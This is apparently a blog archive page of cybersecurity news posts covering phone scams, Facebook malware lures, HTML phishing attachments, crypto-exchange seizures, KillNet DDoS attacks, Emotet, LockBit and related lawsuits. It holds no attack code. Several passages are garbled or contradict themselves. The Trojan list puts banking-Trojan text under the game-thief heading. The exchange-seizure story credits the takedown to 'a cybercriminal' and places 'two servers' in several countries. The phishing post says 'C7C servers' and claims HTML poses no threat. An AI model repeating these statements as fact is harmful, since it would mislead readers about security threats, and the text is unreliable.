Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Cyber Criminals. Show all posts

Delhi Police Alerts Citizens to New Cyber Scam

 

Authorities in Delhi are cautioning residents to remain vigilant against a recent surge in cyber fraud cases known as ‘digital house arrest,’ with over 200 incidents reported monthly in the capital.

Described as a serious threat by senior officials, this tactic employed by cybercriminals aims to coerce victims into parting with their money once ensnared in their schemes.

In this scheme, scammers posing as law enforcement officers deceive victims into believing their bank accounts, SIM cards, Aadhaar cards, or other linked documents have been compromised. The victims are then virtually confined to their homes and pressured into paying the scammers.

According to a senior officer from the Intelligence Fusion and Strategic Operations (IFSO) unit of the Delhi Police, cases involving amounts exceeding Rs 50 lakh are investigated by their specialized team.

In a recent case, a man preparing for work received a call from someone claiming to be from the Mumbai Crime Branch. The caller accused the victim of involvement in drug trafficking using his Aadhaar card and instructed him not to leave his house during a prolonged interrogation session. The victim, fearing repercussions, complied. Eventually, the scammers gained remote access to his computer, drained his bank account, and vanished.

These fraudsters often employ forged police letterheads and use translation tools to enhance their communication. They specifically target vulnerable individuals, such as the elderly. Victims are urged to immediately report such incidents to the police helpline for assistance.

According to the National Crime Records Bureau (NCRB), cybercrime cases in Delhi nearly doubled in 2022, with reported incidents increasing from 345 to 685. This marks a significant rise from the 166 cases reported in 2020.

Cybercriminals Target Facebook Users with Malicious 'Look Who Died' Messages

'Look Who Died' Facebook Scam

In recent times, Facebook scams and fraud have been on the rise, with scammers finding new ways to exploit the platform for their malicious activities. The latest attention-grabbing scam to hit Facebook is the "Look who died" scam, which targets users seeking information about the death of a friend or celebrity. This article will delve into the details of the scam and provide expert advice on how to protect yourself from falling victim.

The 'Look Who Died' Scam: A Threat to Personal Data Security

The 'Look who died' scam operates by sending Facebook users messages with enticing subject lines like "Look who died." Curiosity prompts users to click on the link, expecting to find news or information related to the mentioned death. However, instead of being redirected to a legitimate news article, users unknowingly download a malware virus onto their computers or devices.

The Exploitative Tactics of Scammers on Facebook

As more people join Facebook and engage with its features, scammers are finding new ways to deceive and defraud users. Carey van Vlaanderen, a digital security expert and CEO of ESET Southern Africa, highlights the use of impersonation, fake promotions, and malware spread as some of the tactics scammers employ. Unfortunately, falling victim to these scams can result in financial loss and identity theft.

Identifying and Protecting Yourself from Facebook Scams

Van Vlaanderen emphasizes the need for caution and vigilance when using Facebook. She advises users to be wary of unusual requests or sensitive information being asked for, as these could be warning signs of a potential scam. To verify the authenticity of a message from a Facebook friend, Van Vlaanderen suggests checking for any sudden profile changes or strange posts that may indicate a compromised account.

The Wider Impact of Cybercrime and the Need for Protection

The rise in cybercrime is not limited to Facebook scams but extends to various forms of online attacks. According to experts from the Council for Scientific and Industrial Research (CSIR), cyber-attacks cost the country billions of rands annually. The digitalization era has seen an increase in cybercrime, posing risks to government institutions, large corporations, and small and medium-sized businesses. Financial and data loss, identity theft, and cyber extortion are significant concerns for individuals and organizations alike.

Urgent Action Required: Protecting Against Cybersecurity Breaches

Recent cybersecurity breaches, such as the one that affected the provincial legislature, highlight the urgency of addressing cyber threats. The lack of transparency surrounding such attacks and their implications raises concerns about preparedness and response strategies. ANC chief whip Pat Lekker has called for a debate on the cyberattack, emphasizing the need for open dialogue and effective measures to combat cybercrime.

Shifting Privacy Paradigm and Building Trust

Erhard Brand, a research and development lead at IT authentication company Entersekt, points out that digital privacy concerns are changing how companies handle personal and biometric data. Empowering individuals with control over their privacy fosters an environment of trust. As technology advances, it becomes crucial for companies to prioritize data security and privacy protection.

The 'Look who died' scam on Facebook serves as a reminder of the ever-present threat of online scams and fraud. To protect yourself from falling victim to such scams, exercise caution, be vigilant for warning signs, and adopt best practices for online security. As the cybercrime landscape evolves, individuals, businesses, and governments must work together to combat cyber threats, ensuring a safer digital environment for all.

Emails With HTML Attachments are Still Popular Among Phishing Scammers

 


Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study conducted by security researchers. In addition to this, Barracuda Networks' study also revealed that malicious files now account for over half of all HTML attachments sent via email. There has been a significant increase in applications compared to last year. 

Is there a phishing scam using HTML attachments you know of? To prevent cybercriminals from contacting C7C servers to download crypto-malware, Trojan horses, or other nasty nasties through email, HTML attachments are sent instead of email. 

Phishing scams based on HTML emails have been around for a long time, but people aren't aware of them, and they are increasingly falling for the same. 

There is a high chance that you checked your email more than once this past weekend. This is despite it being a holiday weekend for many people.

Even though HTML files continue to be one of the most common attachments used in phishing scams in 2022, it shows that the method is still one of the most effective methods of getting past spam detection software and delivering spam to targets who are looking for it. 

HTML (HyperText Markup Language) is a markup language developed to display documents created for display in a web browser, according to Wikibooks. The capabilities of technologies such as Cascading Style Sheets (CSS) and programming languages such as JavaScript can make it easier to do this.

It is possible to render HTML documents as multimedia web pages using a web server or a local storage device that receives HTML documents from a web server. An HTML document describes the semantics of a web page and includes clues that indicate how it should appear to the end user. HTML can also describe the content of a web page. 

When victims are sent phishing emails using HTML files, they are frequently directed to malicious websites, downloaded files, or phishing forms that can be displayed locally within their browsers on their computers.

It is common for email security software to overlook attachments when delivering messages to targets since HTML does not pose a threat to the recipients; as a result, messages are delivered successfully to their inboxes. 

Something is interesting about this recent increase in malicious HTML files. This does not seem to be the result of mass attack campaigns in which hackers send the same attachments to many victims. 

To protect against cyberattacks, it is now more imperative than ever to implement appropriate cybersecurity measures. The key to preventing such attacks is what the report uses as an example of how to prevent them. 

It has been reported that the cybercriminal groups DEV-0238 and DEV-0253 have also been using HTML smuggling to deliver keyloggers through HTML attachments they have sent using HTML smuggling. HTML smuggling has also been associated with the cybercriminal group DEV-0193 delivering Trickbot malware through HTML smuggling. 

HTML attachments are used in phishing attacks 


HTML attachments spammed by phishing sites are the most common type of HTML attachment. There is generally no malicious code within the HTML file itself. This means it does not have any malicious code that launches arbitrary code into the system even though it looks benign. Despite this, it is recommended to treat this attachment with caution. By mimicking the look of a sign-in page for a service such as Microsoft, Google, or a major online bank, the scam could lead to the user entering their credentials into the form and submitting it, resulting in a malicious website that takes over their account. 

When it comes to spam forms and redirection strategies in HTML attachments, hackers usually use several tactics for implementation. These tactics range from simple redirections to obfuscating JavaScript to disguise phishing forms to steal personal information. 

A secure email gateway and antivirus solution can check email messages for attachments to see if they contain malicious URLs, scripts, or other threats. This could threaten users' security. 

The majority of cybercrime attacks are composed of malicious phishing forms or redirects created using JavaScript in HTML attachments. This is done to avoid detection. 

Considering that malicious files can damage your device and your organization, it has become increasingly important to ensure you take the necessary precautions to keep yourself safe from them. It is imperative to know how to prevent such attempts by taking the following precautions: 

The infrastructure of your email system will be crucial in this case. Antivirus software and firewalls should be updated regularly to function properly. Furthermore, a solid plan of action must be implemented for data loss prevention. DMARC protocols should be defined for your domain as the most effective way to ensure communications security. 

Authenticating with two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. You can be sure that your employees will be protected even if they fall victim to hacker attacks, credential theft, and phishing. This is because they will evaluate their credentials, device, location, time zone, and history of access and limit breaches. 

The importance of employee training on recognizing and reporting malicious HTML attachments shall be recognised. Employees must be trained on how to recognize and report attachments from unknown sources, especially those containing malware. Cybersecurity threats can have serious consequences for a business organization if it is not prevented.

Certainly, obfuscation is one of the common denominators among all the spammed HTML attachments in this case. Having to deal with a threat like this at the email gateway layer demonstrates just how difficult it is to detect.

Cryptocurrency Exchanges Linked to Ransomware

 


Nine cryptocurrency exchange websites have been taken down by the FBI and the Ukrainian police in a daring joint operation. Cybercriminals and ransomware gangs use these websites to launder money for cybercriminals. This is because these websites facilitate money laundering by criminals operating online. Ukrainian prosecutors' offices and the Virtual Currency Response Team were also involved in the operation. 

Several virtual currency exchange services were seized by the FBI on Monday. These services may have been used by cybercriminals to launder money obtained through ransomware hacks. As a result of a collaboration between the FBI's Detroit Field Office and Ukrainian police, the Detroit FBI field office seized virtual currency exchanges used by criminals for anonymous transactions, the United States Department of Justice has announced. 

There is a press release that states that the FBI also received support from the Virtual Currency Response Team (VCRT), the National Police of Ukraine, and the regional prosecutors as a result of the 'crypto exchanges' operation. 

  1. 24xbtc.com 
  2. 100btc.pro 
  3. pridechange.com 
  4. 101crypta.com 
  5. uxbtc.com 
  6. trust-exchange.org 
  7. bitcoin24.exchange 
  8. paybtc.pro 
  9. owl.gold 
These websites allow you to anonymously buy Bitcoin, Ether, and other cryptocurrencies. They offer Russian and English exchange services with few Know Your Customer (KYC) or Anti-Money Laundering (AML) restrictions. In addition to online forums dedicated to criminal activity, websites are also advertised. 

These exchange servers have been shut down, and their domain names have been taken over by US authorities. Several exchanges were accused of offering anonymous cryptocurrency exchange services to website visitors. These visitors included cybercriminals, scammers, and many other bad actors, offering these services anonymously to site visitors. 

The FBI has accused these crypto exchanges of being used by cyber criminals, including scammers, ransomware operators, and hackers, for laundering money. Additionally, the FBI stated that these exchanges did not have a license. This acted as support for criminal activities under US laws. 

Two servers were confiscated. These servers were located in different parts of the world including the US, Ukraine, and several European countries. Cybercriminals used the exchanges to launder money from illegal activities, and the authorities are using the seized infrastructure to identify and track down those hackers.

It should be noted that both the English and Russian-language exchanges that offered similar services and avoided money laundering were censured by the FBI for the lack of anti-money laundering measures and the collection of Customer knowledge information, or none at all. The FBI claims that these sorts of unlicensed, rogue exchanges are one of the most critical hubs of the cybercrime ecosystem. 

Users have been able to convert their cryptocurrency into coins that are more difficult to track down on websites that have been seized anonymously. Hackers disguised the source of the money they stole and avoided detection by law enforcement agencies.

There is a lot of variety on these sites. Users can get live help and instructions in both Russian and English covering a wide range of cybercrime communities. 

The FBI's announcement indicates that noncompliant virtual currency exchanges that operate in violation of the United States Code, Sections 1960 and 1956, act as hubs for cybercrime. They have lax anti-money laundering programs and collect little information about their customers. These exchanges are significant cybercrime centers.

A search was conducted at the home of former FTX executive Ryan Salame early this month. This was part of the FBI's investigation into Salame's role as an advisor to Bankman-Fried at the time. 

During an operation conducted by the FBI and Ukrainian police, the FBI and Ukrainian police took down nine websites known as 'crypto exchanges'. These websites were well known for serving as money launderers for ransomware groups and cyber criminals. As part of an organized campaign, the daring action was undertaken by a cybercriminal who wanted to destroy the digital infrastructure that allows him to make money from his malicious actions by “interfering” with it and using it for his malicious goals. 


New Cybersecurity Vulnerabilities are Being Discovered Using 'Intelligent Mining'

 

When brute force attacks shut down operations and force mines to pay a ransom, "intelligent mining" activities have emerged as the gold mine for cybercriminals. 

Dr. Pierre Jacobs, the head of cybersecurity operations and compliance at CyberAntix, a member of the Sizwe Africa IT Group, holds this opinion. According to him, cyber security breaches have reached a point where they have legalised this dishonest behaviour, giving criminals the opportunity to commit cybercrimes in conditions that are very similar to those of legitimate organisations. Lone hackers are still around and may wish to stop production for fun or to see how far they can go. 

“South African mining companies are no exception,” Jacobs stated. “The transition from traditional mining practices to intelligent mining is exposing the industry to a new frontier of cyber threats.” 

74% of internet businesses have had serious Computer breaches, according to Fortinet research, and this problem was made worse by the Covid-19 outbreak. With an 11% increase in network intrusions, the mining and manufacturing industries in particular experienced a sharp rise in infiltration activity. 

Attackers are focusing their efforts on Industrial Control Systems (ICS) in a variety of industries because these systems regulate a wide range of automated processes, including measuring devices, packaging equipment, and all the other assembly-line parts that are essential to any production process. Attackers are aware that by focusing on these systems, they might negatively impact business operations. 

Although ICS devices are frequently specific to industries and used for specialised systems or activities, they are normally less well-known than enterprise information technology (IT) devices like laptops, desktops, and smartphones. In this sector, cybercriminal activity is becoming more organised and specialised. 

The bulk of cyberattacks on mining businesses aim to disrupt corporate operations and threaten supply chains by stealing intellectual property and other important data, such as geotechnical studies and production plans. According to Jacobs, the Internet of Things (IoT) is a threat to mines with any amount of automation (IoT). Criminals frequently use email platforms as their first method of entry in all sectors. 

Any of these devices—desktops, laptops, smartphones, even the workplace printer—can serve as entry points for hackers. The fact is that mining operations in South Africa are also impacted by geopolitical concerns, rising geopolitical dangers, and intermittent conflicts between other nations, especially Western nations and China. Mines from throughout the world compete with South African exporters. Competitors worldwide would benefit from any disruption to our supply systems.

Cybersecurity breaches are caused by a number of factors, including a lack of understanding of the Industrial Internet of Things (IIoT) and the Internet of Things (IoT), supply chain weaknesses, lax security procedures used both internally and by outside contractors, identity theft, and insufficient incident response. 

"Strategies to mitigate risk should seek to identify and understand the business models and motivation of the cyber criminals. Businesses also need to understand the risks and vulnerabilities of their industry and anticipate threats," Jacobs concluded. "People, processes, and technologies all pose risks, and to address cyber security threats, it’s important to take a three-pronged approach to security – one that focuses on people, processes, and technologies. The challenge is to secure the enterprise by locking all the information entrance gates to bridge any gaps in the system. Identify critical business systems and then identify risks against those systems. Secure protocols need to be in place wherever there is a connection to the Internet. Real-time monitoring and investigation are vital." 

Block KillNet's DDoS Bots Using These Proxy IP Addresses

 


The US government has issued a warning about the Russian cybercrime gang stepping up its attacks against hospitals and health clinics by flooding their networks and using, as part of its warning, a free tool that is designed to help organizations defend against KillNet distributed-denial-of-service (DDoS) bots. 

Currently, tens of thousands of proxy IP addresses are listed on the KillNet open proxy IP blocklist. These IP addresses are being used by Russian hackers in their attempts to flood networks with traffic. Following the investigation that SecurityScorecard's threat researchers conducted on Killnet and other network spamming miscreants, the security company built this list of threats.

Although DDoS attacks are relatively unsophisticated, like many other attacks, they can still take a serious toll, especially when they disrupt hospitals, according to a recent blog post by the security firm using KillNet as an example. 

A website taken down by the Russian gang toward the end of January was one of 14 hospitals targeted in the United States. The University of Michigan Hospitals and Health Centers, Stanford Hospital, Duke University, and Cedars-Sinai Medical Center, among others, were some of the hospitals. There are several reasons for using DDoS attacks, one of which is to mask more intrusive activities. 

A report released by the US Department of Health and Human Services (HHS) on Wednesday confirmed that KillNet is a threat to the healthcare sector and prompted DHS to issue a second warning. A similar security alert has been issued by the Department of Homeland Security twice in the last few months.  

It is common for pro-Kremlin supporters to attach an ideological bent to their attacks - sometimes using empty threats to convey their message. "Killmilk, one of the leading members of the KillNet group, has threatened the US Congress with the sale of the health and personal information of American citizens to attack US policies concerned with Ukraine," according to the December security alert from HHS. According to the US, the planned attack has not yet been carried out. 

In a similar vein, the gang threatened to attack ventilators and other technical devices in British hospitals if another alleged KillNet criminal arrested in London in May was not released as soon as he was arrested. 

Although KillNet may claim to have carried out attacks on the US military, it is wise to take its claims with a pinch of salt, according to HHS. Given the fact that the group tends to exaggerate, there is a possibility that some of these operational and development announcements may simply be meant to garner attention, both publicly and within the cybercrime underground. According to the FBI and private security researchers, the group's DDoS campaigns have been viewed as publicity stunts, which, as annoying as they have been, have had "limited success." 

A Public Relations Stunt That Could Turn Wrong   

KillNet claimed responsibility on October 10 for deactivating more than a dozen websites associated with US airports as part of an attack aimed at knocking the websites offline. Although the large-scale DDoS attack was disruptive, it did not disrupt air travel or harm the operation of the airports. 

As soon as someone claimed to have unleashed a second bot army against JPMorgan Chase a day later, the same criminals saw similarly feeble results. In my opinion, some PR agency is trying to increase their budget for PR. 

It was then that at the beginning of November, a US Treasury official announced that the department had halted a "pretty low-level" DDOS attack designed to disrupt critical infrastructure nodes in the department, also attributed to Killnet.  

KillNet's DDoS attacks usually do not cause major damage but they have the potential to disrupt healthcare organizations and the millions of patients they serve for hours, days, or even weeks - and this can be especially damaging to organizations and patients in the healthcare sector.  

It has been reported that these bots are flooding the network traffic of patients and doctors, preventing them from sending and receiving health information online and making it harder for patients to schedule appointments in the future.  

Furthermore, sometimes miscreants use DDoS attacks as a distraction for their security teams to keep their attention while they work on more dangerous attacks, including the theft of sensitive information or the deployment of ransomware. 

According to HHS, it is likely that pro-Russian ransomware groups, including those that were part of the defunct Conti group, will respond to KillNet's appeal and offer support. These results will most likely lead to KillNet targeting entities that will be victimized by extortion or DDoS attacks as a means of extortion, a tactic that several ransomware groups have employed.

Following a Surge in Metaverse Crimes, Interpol Promises to Implement Punishment


Real-world criminals are now attempting to conduct malicious practices in the virtual world, but this time they may as well face its repercussions. In order to assure the same, the International Criminal Police Organization (ICPO) is on its way to developing techniques that could identify authority crimes in the Metaverse to combat cyber-attacks and criminals lurking in the digital world. 

According to Secretary General Jurgen Stock, the objective of Interpol is to monitor criminal activities across the metaverse. The “sophisticated and professional” criminals are opting for advanced technological tools and tactics to commit crimes, which has to stop for the sake of online users. 

As the number of people using the metaverse rises, more crimes including data theft, money laundering, crimes against children, financial fraud, ransomware, phishing, etc. could occur. 

Stock believed that it was essential for Interpol to remain relevant and implement new technology as they were developed. He stressed the importance of Interpol's response to the problem, emphasizing how rapidly criminals are adopting new technologies for their illicit activities. 

He also noted that the company’s authorities run short of necessary resources at times, in order to carry out their jobs effectively. They have seen firsthand how if action is delayed, trust in the agency's resources and, consequently, the metaverse, may as well be tarnished. Such services are currently available, and criminals are already using them. 

What does Interpol Consider Crime in Metaverse? 

Interpol's virtual reality (VR) realm offers law enforcement a glimpse into the metaverse and a preview of the kinds of crimes that might be committed there through its secured servers. This further gives law enforcement personnel an opportunity to learn about the challenges of policing in the metaverse and test out potential solutions. 

However, Interpol’s Executive Director of Technology and Innovation Madan Oberoi notes that the firm is having trouble defining what constitutes a crime in the metaverse and spreading awareness of such crimes. “There are crimes where I don’t know whether it can still be called a crime or not. If you look at the definitions of these crimes in physical space, and you try to apply it in the metaverse, there is a difficulty,” he says. 

Moreover, the organization also asserts that one of its main tasks is informing the public about these issues. According to Oberoi, law enforcement agencies must make sure to educate themselves about the metaverse in order to effectively assist victims or potential victim users of crimes pertaining to the metaverse. 

In order to efficiently combat cybercrime, one of the best solutions Interpol may implement is to deal with regulating criminal acts in the metaverse and encourage law enforcement agencies to keep up with the technology's rapid advancement. Interpol promises to be in full force in assisting with criminal investigations and crime-solving. Interpol and its 195 member nations will cooperate to combat global cybercrime.   

Linux Malware Records a New High in 2022


While more and more devices are adopting Linux as their operating system, the popularity of the software has nonetheless attracted cyber-criminals. According to recent reports, the number of malware aimed at the software increased dramatically in 2022. 

As per the reports from observations made by Atlas VPN based on data from threat intelligence platform AV-ATLAS, as many as 1.9 million Linux malware threats were observed in 2022, bringing the figure up 50% year-on-year. 

The reports further claimed that most of the Linux malware samples were discovered in the first three months of the year. 

 Secure Operating System

In Q1 2022, researchers identified 854,690 new strains. The number later dropped by 3% in Q2, detecting 833,065 new strains. 

The number of new detections fell 91% to 75,841 in the third quarter of the year, indicating that Linux malware developers may have taken their time off. The numbers increased once more in the fourth quarter of the year, rising by 117% to 164,697. 

Despite the researcher’s observations, Linux remains one of the “highly secure operating systems.” 

“The open-source nature of Linux allows for constant review by the tech community, leading to fewer exploitable security vulnerabilities. Additionally, Linux limits administrative privileges for users and compared to more widely used operating systems like Windows, it still has less malware targeting it,” the researchers added. 

While threat actors will not stop chasing flaws in the world’s fifth most popular operating systems, businesses and consumers alike must also be on the lookout, the researchers concluded. 

Although Linux is not as popular as Windows or macOS, it is still a widely used operating system. From Android devices (which are built on Linux) to Chromebooks, video cameras, and wearable devices, to all kinds of servers (web servers, database servers, email servers, etc.) there are more than 32 million endpoints operating on Linux.  

The 5 Most Common Types of Trojans You Should Know About

 

Cybercriminals create more complicated and diverse methods of obtaining sensitive data as we become more dependent on technology and entrust it with more of our personal information. There are many different types of harmful malware, including Trojan Horses. But there are various varieties of this malware. Trojan Horses come in a variety of forms and are created for various purposes. 

What are the most typical Trojan types that you should be on the lookout for? Let's quickly review what Trojan Horses are before we look at the various types of them.

The Odyssey, a work of Homer's from classical Greece, is where the phrase "Trojan Horse" first emerged. The city of Troy receives a large wooden horse as a gift, but the recipients have no idea that soldiers are concealed inside the animal. The soldiers can invade when the horse enters the city.

Similar to the original, a Trojan Horse program conceals itself in otherwise defenseless software. For instance, you might believe that an app is safe to download and install, but the developer may have added a Trojan to the program. Once the program has infected your device, it can be used for a variety of illegal activities, including remote control, data theft, and activity monitoring.

Different Trojan Types:

It's crucial to be aware of the various Trojan Horse types so you can better protect yourself.

1. Downloader trojans

The operation of downloader Trojans requires an internet connection. When a device is infected by the Trojan, it does not do anything until an internet connection is made, at which point it can download more malicious software to aid the hacker in their attack. On the infected device, this type of Trojan can also start up malicious software. They serve as a kind of opening salvo in the assault, giving the hacker a firm grip on the target.

2. Rootkit Trojan

Software tools called rootkits are utilized for remote administrative access. Frequently, unauthorized remote access serves as a launchpad for a cyberattack. The attacker can exploit the infected device by performing a variety of different tasks with administrative access provided by a rootkit Trojan. A cybercriminal might, for instance, run another malicious programme, steal confidential login information, or listen in on personal communications.

3. Fake Antivirus Trojans

False antivirus Trojans, as their name implies, pose as antivirus software. In this way, the victim will believe the programme is keeping them safe when the reality is completely the opposite. Even though the programme may try to trick you by imitating antivirus functions, its true objective is exploitation. By intimidating the user into purchasing additional security measures, such software defrauds them of their money.

4. Banking Trojans

Banking data is the main focus of banking Trojans. In the world of cybercrime, bank credentials are a highly sought-after type of data because they can give attackers direct access to a victim's money. This type of information is frequently traded on the dark web, where criminal enterprises will pay hackers to gain access to their stolen information. Banking Trojans frequently target the websites of financial institutions.

5. Game-Thief Trojans

An attacker can obtain the victim's banking credentials when a banking Trojan is downloaded onto the victim's device. Banking Trojans can assist the attacker get past two-factor authentication barriers in addition to login credentials, which is a security measure that many people use to protect their online bank accounts.

Game-thief Trojans, also known as "gaming Trojans," are used to hack into gaming accounts and steal personal data. There are currently millions of online gaming accounts, giving cybercriminals a market for data theft. When the Trojan gains access to important data, it will then send that information to the attacker. For instance, a user's Steam account might be targeted in order to gain access to payment data or steal virtual goods.

Trojan horses are so adaptable that they put internet users at risk in various ways, making it challenging to avoid them. But you can more effectively avoid Trojan Horses and protect yourself and your data by being aware of the risks and using extra caution when using your devices.

Financial Service API and Web Application Attacks are up by 257%

 



Various cyber security networks are publishing reports and providing data on various ongoing issues and every day there is a new addition of cyber threat and consequently to the security arsenal. However, managing the attack surface (vulnerabilities, attack vectors, etc) is the biggest challenge that modern society is witnessing. 

In today’s hybrid and multi-cloud environments, apps and APIs are potential targets that cyberhackers can and will exploit. Recently, CDN provider Akamai Technologies, Inc., has released new research in which they have disclosed that year-over-year 257% growth has been seen in web application and API attacks on financial service institutions. 

The report indicates a growing risk to the financial services sector and a shift to more advanced and sophisticated cyberattacks. The report also revealed that DDoS attacks on financial services institutions have grown by 22%. 

Furthermore, the study shows that cybercriminals are using techniques in their phishing campaigns to bypass two-factor authentication solutions. 

It is alarming that various institutions are collecting data on recent cybercrime, as we mentioned in the beginning. In this regard, Enemy at the Gates, published a report that revealed that roughly 80 percent of threat attackers aim their efforts at customers of financial services in an attempt to find paths of least resistance for monetary gain. 

“Companies have moved key infrastructure over to APIs, so the criminals are following the revenue. But on top of that, APIs are newer and, in many cases, don’t have the same level of maturity in security processes and controls, so are more vulnerable,” Steve Winterfeld, advisory CISO at Akamai said. 

Along with this, the company recommended a number of steps that enterprises can take to prevent API-driven threats. 
  • Institutions should invest in technologies to automatically discover, validate and catalog APIs, at the same time developing a security strategy that incorporates API security testing and API access control. 
  • Increasing transparency over what internal and third-party APIs are used for as it ensures that enterprises are in a position to start mitigating potential threats across the attack surface. 
  • Updating phishing defenses to counter the latest MFA attacks with FIDO2-compliant capabilities should be the priority for the institutions. 
“Finally, they are easier to automate attacks against as they are designed for automation. These factors combine to make APIs a smart place for attackers to focus. This is also why CISOs need to focus on them,” Winterfeld added.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic

 

According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed against the facility, which is the busiest in the Western Hemisphere. The goal seems to harm the US economy in many situations, however, profits through extortion and data theft will also be a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Emotet Malware: Shut Down Last Year, Now Showing a Strong Resurgence

 

The notorious Emotet malware operation is exhibiting a strong resurgence more than a year after being effectively shut down. Check Point researchers put the Windows software nasty at the top of their list as the most commonly deployed malware in a March threat index, threatening or infecting as many as 10% of organisations around the world during the month – an almost unbelievable figure, and more than double that of February. 

Now, according to Kaspersky Labs, a swiftly accelerating and sophisticated spam email campaign is intriguing targets with fraudulent emails designed to swindle them into unpacking and installing Emotet or Qbot malware, which can steal data, collect information on a compromised corporate network, and move laterally through the network to install ransomware or other trojans on networked computers. 

Qbot, which is associated with Emotet's operators, is also capable of accessing and stealing emails. In a blog post this week, Kaspersky's email threats protection group manager, Andrey Kovtun, stated. In February, Kaspersky discovered 3,000 malicious Emotet-linked emails, followed by 30,000 a month later, in languages including English, French, Italian, Polish, Russian, and Spanish. 

Kovtun wrote, "Some letters that cybercriminals send to the recipients contain a malicious attachment. In other cases, it has a link which leads to a file placed in a legitimate popular cloud-hosting service. Often, malware is contained in an encrypted archive, with the password mentioned in the e-mail body." 

The spam email often claims to include essential information, such as a commercial offer, in order to persuade the recipient to open the attachment or download the harmful file via the link. "Our experts have concluded that these e-mails are being distributed as part of a coordinated campaign that aims to spread banking Trojans," he wrote further. 

Cryptolaemus, a group of security researchers and system administrators formed more than two years ago to combat Emotet, announced on Twitter this week that one of the botnet subgroups has switched from 32-bit to 64-bit for loaders and stealer modules, indicating the botnet's operators' continued development. Emotet immediately resurfaced in the malware world's upper echelons. Europol, along with police departments from the United States, Germany, the United Kingdom, and Ukraine, completed a multinational takedown of the primary botnet deploying Emotet in February 2021. Raids on the accused operators' houses in Ukraine were part of the operation. 

The raid, according to Europol, substantially impacted Emotet's operations, which were used to infiltrate thousands of firms and millions of computers around the world. However, in publishing its March threat index, Check Point Research stated that Emotet resurfaced in November 2021 and has gained traction after the Trickbot botnet infrastructure was shut down in February. It is once again the most common malware. 

The researchers wrote, "This was solidified even further [in March] as many aggressive email campaigns have been distributing the botnet, including various Easter-themed phishing scams exploiting the buzz of the festivities. These emails were sent to victims all over the world with one such example using the subject 'Buona Pasqua, happy easter,' yet attached to the email was a malicious XLS file to deliver Emotet." 

Meta Takes Legal Action Against Cyber Criminals

 

Facebook's parent company, Meta Platforms, announced on Monday that it has filed a federal lawsuit in the U.S. state of California against malicious attackers who ran more than 39,000 phishing websites impersonating its digital properties to trick consumers into disclosing their username and password. 

“Today, we filed a federal lawsuit in California court to disrupt phishing attacks designed to deceive people into sharing their login credentials on fake login pages for Facebook, Messenger, Instagram, and WhatsApp. Phishing is a significant threat to millions of Internet users”, states the report. 

The social engineering strategy entailed the construction of rogue websites that tried to portray as Facebook, Messenger, Instagram, and WhatsApp login pages, prompting victims to input their login details, which were subsequently captured by the defendants. The unidentified actors are also being sought for $500,000 by the tech behemoth. 

The assaults were conducted with the help of Ngrok, a relay service that diverted internet traffic to malicious websites while concealing the exact location of the fraudulent equipment. Meta stated that the frequency of these phishing assaults has increased since March 2021 and that it has collaborated with the relay service to restrict thousands of URLs to phishing sites. 

The lawsuit comes just days after Facebook revealed it was making efforts to disrupt the activities of seven surveillance-for-hire firms that generated over 1,500 phony identities on Facebook and Instagram to target 50,000 users in over 100 countries. Meta announced last month that it has barred four harmful cyber groups from attacking journalists, humanitarian organizations, and anti-regime military forces in Afghanistan and Syria. 

“This lawsuit is one more step in our ongoing efforts to protect people’s safety and privacy, send a clear message to those trying to abuse our platform, and increase accountability of those who abuse technology. We will also continue to collaborate with online hosting and service providers to identify and disrupt phishing attacks as they occur. We proactively block and report instances of abuse to the hosting and security community, domain name registrars, privacy/proxy services, and others. And Meta blocks and shares phishing URLs so other platforms can also block them”, mentioned the report.

Google sued two Russians hackers

Google has filed lawsuits against two Russians - Dmitry Starovikov and Alexander Filippov. According to the company, they are behind the activities of a botnet called Glupteba.

The corporation claims that Glupteba has infected more than a million Windows devices worldwide, the increase in infections can be "thousands" daily. The botnet was used to steal Google user account data. Most often, the infection occurred after users downloaded free applications from unauthorized sources.

In addition to stealing and using other people's data, Glupteba was aimed at covert mining of cryptocurrencies and redirecting other people's traffic through infected computers and routers. Using this method, illegal traffic can also be redirected to other people's devices.

Google notes the sophisticated technical complexity of Glupteba. It uses a blockchain, the decentralized nature of which allows it to effectively protect itself from work disruptions. For the company, this is the first case of fighting a botnet on the blockchain.

The main infrastructure of the botnet is now neutralized. Those who managed the network from infected devices no longer have access to it. However, the company notes that this statement is valid only at the moment.

Google assumes that it was Starovikov and Filippov who managed Glupteba, relying on data in their Gmail accounts and Google Workspace office applications. The company insists on reimbursing them for damage, as well as a lifetime ban on their use of Google services.

According to experts, this could create a positive precedent. If the Russians really manage to be punished significantly, this will significantly weaken the community as an attacker in cyberspace. At a minimum, the hackers' sense of impunity will disappear. You can read about how Google representatives tracked hackers on the company's official website.

HHS Cybersecurity Agency Issues Threat Briefing on LockBit Ransomware

 

A security report on LockBit, a ransomware gang that reportedly published a new variant, has been issued by The Health Sector Cybersecurity Coordination Center. The cybercriminals were behind the highly reported cyberattack on Accenture this summer, wherein the corporation was supposedly threatened with a ransom demand of $50 million. 

LockBit ransomware is a malicious program that prevents users from accessing their computers in return for a ransom demand. LockBit will automatically scan a network seeking valuable targets, spread the virus, and lock all computers that are accessible. This ransomware is employed in very specific cyberattacks against businesses and other organizations. 

LockBit was introduced in September 2019 and began advertising its "ransomware as a service" affiliate scheme in January 2020, according to HC3. 

